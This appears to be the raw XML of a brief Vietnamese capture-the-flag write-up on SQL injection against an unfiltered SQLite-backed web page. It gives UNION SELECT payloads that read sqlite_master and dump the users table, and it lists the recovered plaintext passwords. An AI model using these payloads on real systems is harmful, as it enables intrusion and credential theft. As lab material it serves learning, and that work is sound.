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0C6A" w14:textId="5C090C46" w:rsidR="0064286E" w:rsidRDefault="0064286E" w:rsidP="0064286E">
      <w:r>
        <w:t>Đầu tiên vào trang web thì không có filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E179941" w14:textId="469C65F4" w:rsidR="0064286E" w:rsidRDefault="0064286E" w:rsidP="0064286E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28142FC8" wp14:editId="2979D084">
            <wp:extent cx="6081032" cy="2343150"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1049865994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5994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/>
                    <a:srcRect t="7754" r="43406" b="53479"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6090199" cy="234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F1B5F" w14:textId="77777777" w:rsidR="0064286E" w:rsidRDefault="0064286E" w:rsidP="0064286E"/>
    <w:p w14:paraId="1DA9CD4D" w14:textId="0063C1F1" w:rsidR="0064286E" w:rsidRDefault="0064286E" w:rsidP="0064286E">
      <w:r>
        <w:t>Thực hiện kiểm tra thì có 2 table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1635C8E2" w14:textId="77777777" w:rsidR="0064286E" w:rsidRDefault="0064286E" w:rsidP="0064286E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41412F05" wp14:editId="7CB5AF33">
            <wp:extent cx="6036469" cy="2228850"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="206673409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4094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l="104" t="8308" r="25649" b="42957"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6042687" cy="223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2FE6" w14:textId="6140006D" w:rsidR="0064286E" w:rsidRDefault="0064286E" w:rsidP="0064286E">
      <w:r>
        <w:t>Thực hiện kiểm tra 2 table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28684BA3" w14:textId="77777777" w:rsidR="0064286E" w:rsidRDefault="0064286E" w:rsidP="0064286E">
      <w:r w:rsidRPr="00E74188">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="610F364E" wp14:editId="1FA33511">
            <wp:extent cx="6115050" cy="3955415"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="1178316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1682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B72B" w14:textId="7D251FB1" w:rsidR="0064286E" w:rsidRDefault="0064286E" w:rsidP="0064286E">
      <w:r>
        <w:t>Xem thông tin 2 table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442A7545" w14:textId="77777777" w:rsidR="0064286E" w:rsidRDefault="0064286E" w:rsidP="0064286E">
      <w:r w:rsidRPr="00E74188">
        <w:t>1' union select 1,sql from sqlite_master--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE1B5BA" w14:textId="77777777" w:rsidR="0064286E" w:rsidRDefault="0064286E" w:rsidP="0064286E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="533781C6" wp14:editId="137A7667">
            <wp:extent cx="5270500" cy="2786867"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="87026445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64455" name="Picture 1" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId7"/>
                    <a:srcRect t="7569" r="62098" b="56803"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5284333" cy="279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51CA3" w14:textId="0E9E4061" w:rsidR="003E4023" w:rsidRDefault="003E4023" w:rsidP="0064286E">
      <w:r>
        <w:t>Thực hiện gọi data bên trong và có flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D057C5C" w14:textId="2701D04E" w:rsidR="0064286E" w:rsidRDefault="0064286E" w:rsidP="0064286E">
      <w:r w:rsidRPr="0064286E">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="0064286E">
        <w:t xml:space="preserve"> union select username,password FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26809C75" w14:textId="77777777" w:rsidR="0064286E" w:rsidRDefault="0064286E" w:rsidP="0064286E">
      <w:r>
        <w:t>admin (c4K04dtIaJsuWdi)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFEEF79" w14:textId="77777777" w:rsidR="0064286E" w:rsidRDefault="0064286E" w:rsidP="0064286E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>user1 (OK4dSoYE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0535CCED" w14:textId="77777777" w:rsidR="0064286E" w:rsidRDefault="0064286E" w:rsidP="0064286E">
      <w:r>
        <w:t>user2 (8Wbhkzmd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C035D03" w14:textId="77777777" w:rsidR="0064286E" w:rsidRDefault="0064286E" w:rsidP="0064286E">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C1D0F5A" wp14:editId="61E2E9E7">
            <wp:extent cx="6255385" cy="3515735"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="176997859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78595" name="Picture 1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l="-10" t="169" r="221" b="127"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6288191" cy="353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CFA66" w14:textId="77777777" w:rsidR="00D523DC" w:rsidRDefault="00D523DC"/>
    <w:sectPr w:rsidR="00D5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5F"/>
    <w:rsid w:val="003E4023"/>
    <w:rsid w:val="0064286E"/>
    <w:rsid w:val="006E235F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8AE0"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{4813BCCC-7181-4C89-9C3D-CA1AD627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6E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2023-04-07T16:54:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-07T16:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>